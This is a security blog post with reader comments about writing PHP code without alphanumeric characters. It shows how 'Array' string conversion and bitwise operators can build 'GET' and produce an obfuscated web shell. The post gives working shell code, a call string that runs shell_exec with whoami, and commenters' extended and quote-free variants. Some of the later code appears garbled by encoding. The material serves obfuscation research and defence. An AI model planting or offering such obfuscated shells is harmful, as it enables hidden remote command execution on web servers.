Non alphanumeric code in PHP

So a small php shell was tweeted around and it inspired me to investigate a way to execute non-alphanumeric code. First off I started with the idea of using octal escapes in PHP and constructing the escape so for example: \107 is “G” if I could construct the “107″ and add the backslash to the beginning maybe I could construct “G”. It worked like this:


$_=+"";
$_=(++$_)+(++$_)+(++$_)+(++$_);
$__=+"";
$__++;
$___=$_*$_+$__+$__+$__+$__+$__+$__+$__;//107
$___="\\$___";

But there was no way to evaluate the escape once it was constructed without using alphanum chars. So I was stumped.
Then I had a brain wave, php automatically does a string conversion for arrays and converts them to “Array” when accessed as a string. I had “A”, “r”, “r” etc but I really needed “GET” in order to create a nice small non-alpha shell.

Onto the second technique, PHP allows you to use bitwise operators on strings :D

'a'|'b';//c!

We can make new characters by combining others, but I only had a limited set to work with. A simple for loop later I combined the characters to create “GET” and thus make our non-alphanum small PHP shell :D


<?
$_="";
$_[+""]='';
$_="$_"."";
$_=($_[+""]|"0x06").($_[+""]|"0x05").($_[+""]^"0x15");
?>
<?=${'_'.$_}['_'](${'_'.$_}['__']);?>

The first part converts a string into an array by attempting to assign to “0″ position of the string. Then I make sure the array is a string. Then I use “A” from array with bitwise operators to construct “G”, “E” and “T” using the characters “A”|0×6, “A”|0×5 and “A^0×15″. There you have it,you could even generate non-alpha code without using GET quite easily by producing different characters until you get an eval method.

To call the shell you’d use:
?_=shell_exec&__=whoami

Don’t forget in order to analyze php code use RIPS if you ever encounter this in the wild.

20 Responses to “Non alphanumeric code in PHP”

  1. Mathias Karlsson writes:

    Nice techniques! To add, if you wish to call a function with multiple argument you could use

    With
    “?_=call_user_func_array&__=shell_exec&___[0]=whoami”
    Cheers! :)

  2. Gareth Heyes writes:

    Stefan Esser also commented you can get Array without single quotes @$§[]=$§; and of course you can get underscore as well.

  3. Fredrik Nordberg Almroth writes:

    Woah. Awesome Gareth.
    However Mathias code seemed to be filtered out; you can find it here: http://downloads.ackack.net/heyes_technique_multi.txt

  4. Cris writes:

    Awesome :0

  5. Gareth Heyes writes:

    @Fredrik

    You’re missing the first part which requires an Array in order to produce the non-alpha code.

  6. Fredrik Nordberg Almroth writes:

    Woops! I’ll contact Mathias!

  7. Mathias Karlsson writes:

    @Gareth
    I didn’t include that part because I didn’t change anything in it. You are right, the first part is needed, obviously. My point was only that if you add another variable you don’t have to depend on functions with only one argument, by using call_user_func_array.

  8. Gareth Heyes writes:

    @Mathias

    Ah gotcha fair enough!

  9. Jesper Wallin writes:

    Really interesting, but quite scary. Yet another reason to run the httpd inside a jail/chrooted environment with very limited access. :P

  10. Toby writes:

    Have to love scripts like this – Why on earth did you build that? BECAUSE I CAN!

    I found the way you got GET from ‘A’ fascinating. An excellent read!

  11. Thomas Stig Jacobsen writes:

    Great post, it reminded me of jjencode actually.

  12. Charlie writes:

    Hey Gareth, just found your blog. Great stuff! I wish there were more writers writing about interesting secure coding – this kind of material is hard to find! Subscribed.

  13. Mathias Karlsson writes:

    Another comment. You can strip down the last line by removing all singlequotes and adding an @ for suppressing, since PHP will give you the warning “Notice: Use of undefined constant _ – assumed ‘_’ in [...]” and continue to run :)

  14. Gareth Heyes writes:

    @Mathias

    I have since improved it and removed all quotes and underscores:
    http://hackvertor.co.uk/hvurl/2w

    < ?php $§[]=$§;$§=$§.$§;$?=+$§;$?=$?;$?++;$?=$?+$?;$?=$?+$?;$?=$?+$?;$?=$?+$?;$?=$?+$?;$?=$?+$?;$?=$?+$?;$?=$?+$?;$?=$§[$?]|($§[$?]^);$?=$§[$?];$?=$§[$?]|($§[$?]&â);$?=$§[$?+$?];$?=$?^($?.?);$?=$?.$?.$?;$?=$?($?.$?).$?($?.$?.$?).$?($?.$?.$?).$?($?.$?.$?).$?.$?($?.$?.$?);$?($?($?.$?).$?($?.$?.$?).$?($?.$?.$?).$?($?.$?).$?($?.$?.$?).$?($?.$?).$?($?.$?).$?($?.$?).$?($?.$?).$?($?.$?).$?($?.$?).$?($?.$?).$?($?.$?).$?($?.$?).$?($?.$?));?>

  15. Mathias Karlsson writes:

    Touché, that’s really cool man!

  16. Jim writes:

    When I started reading this the first thing I thought about is exploits! Another was security. You could secure your source code using something like this.

  17. Gareth Heyes writes:

    @Jim

    Secure is the wrong word, obfuscate is more accurate. The code is hard to de-obfuscate but not impossible.

  18. iosif writes:

    There exists some reasons to use “alphanumeric code” or this is only for “fun”?

  19. Gareth Heyes writes:

    “Without testing the boundaries of what is possible we cannot hope to provide adequate defences.”

  20. iosif writes:

    Thanks for your promptitude.